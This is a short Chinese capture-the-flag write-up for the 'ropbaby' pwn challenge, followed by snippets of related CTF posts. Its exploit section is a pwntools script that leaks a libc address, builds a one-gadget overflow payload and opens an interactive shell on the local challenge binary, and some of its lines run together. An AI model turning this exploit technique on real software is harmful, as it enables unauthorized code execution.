1.实验吧_ropbaby(西普杯CTF)

分析
1.先查看文件位数，安全机制
2.查看strings，调用函数（特别注意常见的函数）
漏洞点
EXP

from pwn import *
context.log_level = "debug"p = process('./ropbaby')p.recvuntil(': ')
p.sendline('2')
p.recvuntil('Enter symbol: ')
p.sendline('system')
a=p.recvline()
libc = a.split(': ')[-1]
lib=int(libc,16) - 0x45390
log.success('libc : %#x',lib)
onegadget =0x45216+libp.recvuntil(': ')
p.sendline('3')
p.recvuntil('(max 1024): ')
p.sendline('17')
p.sendline('a'*8 + p64(onegadget))
p.recvuntil(': ')
p.sendline('4')  #让题目正常退出
p.interactive()

1.实验吧_ropbaby(西普杯CTF)_onegadget相关推荐

2016 西普杯丶天津CTF预选赛（3/6）
哆啦A梦(图片隐写) 格式:SimCTF{ } 解:放到kail中binwalk一下(Binwalk是一个固件的分析工具,旨在协助研究人员对固件非分析,提取及逆向工程用处.简单易用,完全自动化脚本,并 ...
常熟理工php实验三_西普学院（实验吧）Web题解
1.你能跨过去吗? Key Words:XSS 根据提示考察XSS,看给出的链接需要的是编解码 http://www.test.com/NodeMore.jsp?id=672613&page= ...
西普杯铁三2018——数据赛
重做了一下,以前杂项只专注做过密码与隐写,在铁三上就等着GG 0x01 网站后台密码是多少? 打开第二个数据包 passwd:aabbcc 0x02 攻击者IP是多少? 由上图得出为202.1.1.2 ...
2018西普杯铁三西北赛区流量分析
经典流量分析题目,每次都要拿出来用索性整理好下次方便点本文所用的WireShark语法 http 显示出所有的HTTP协议数据 ip.addr == xxxx 显示出所有数据中地址为xxxx的包 i ...
西普部分CTF题目（逆向）
1.阿拉丁神灯http://ctf1.simplexue.com/crack/1/ 这个比较简单,用ida加载后,函数列表里有Button1_click,点击进去后发现这里有个比较函数,应该是输入的 ...
【突发】西普教育实验吧NISP网站故障
北京西普阳光教育科技股份有限公司(简称"西普教育")是国内有名的网络安全教育培训机构.如果你不知道这家公司,或许你听说过网络安全行业有名的在线平台"实验吧"-- ...
【西普实验吧】求解！
求解!分值:10 来源: 西普学院难度:易参与人数:3497人Get Flag:251人答题人数:286人解题通过率:88% 密文xztiofwhf是用仿射函数y=5x+11加密得到的解题链接: 通 ...
[网络安全提高篇] 一〇九.津门杯CTF的Web Write-Up万字详解（SSRF、文件上传、SQL注入、代码审计、中国蚁剑）
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.这篇文章主要介绍5月9日参加津门杯CTF题目知识,包括power_cut.hate_ ...
西普学院逆向writeup ---------你会吗？？
西普学院逆向writeup ---------你会吗?? --------跳跳龙明天我们学校就要ctf比赛,深夜前10几分钟正好解了一道逆向题,是西普学院的,昨天,在小强的提醒下,也解了一道,今天就 ...

1.实验吧_ropbaby(西普杯CTF)_onegadget

1.实验吧_ropbaby(西普杯CTF)_onegadget相关推荐

最新文章

热门文章